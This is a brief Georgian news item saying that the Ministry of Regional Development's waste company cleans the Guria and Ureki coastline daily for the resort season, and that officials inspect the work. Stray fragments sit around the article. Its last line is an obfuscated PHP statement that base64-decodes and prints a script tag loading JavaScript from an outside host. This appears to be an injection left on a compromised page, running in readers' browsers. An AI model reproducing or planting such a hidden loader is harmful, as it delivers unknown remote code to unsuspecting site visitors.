celsiusi
ავერსი შნაიდერი

 გურიის რეგიონი ახალ საკურორტო სეზონს მოწესრიგებული სანაპირო ზოლით ხვდება,- ამის შესახებ ინფორმაციას საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტრო ავრცელებს.

მათივე განმარტებით, საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს შპს “საქართველოს მყარი ნარჩენების მართვის კომპანია” მუდმივად ზრუნავს დამსვენებლებისთვის სუფთა და კომფორტული გარემოს შექმნაზე.

უწყების ინფორმაციით, სანაპირო ზოლს კომპანიის 220 ადგილობრივი თანამშრომელი ყოველდღიურად ასუფთავებს, რისთვისაც მობილიზებულია ქვიშის საცრელი მანქანა-დანადგარები (Beach tech), ტრაქტორები და სხვა სპეციალური ტექნიკა.

საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრის მოადგილე მზია გიორგობიანი და შპს საქართველოს მყარი ნარჩენების მართვის კომპანიის დირექტორი გიორგი შუხოშვილი ადგილზე გაეცნენ ურეკის შავი ზღვის სანაპირო ზოლის თანამედროვე ტექნიკით დასუფთავების პროცესს.

245
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");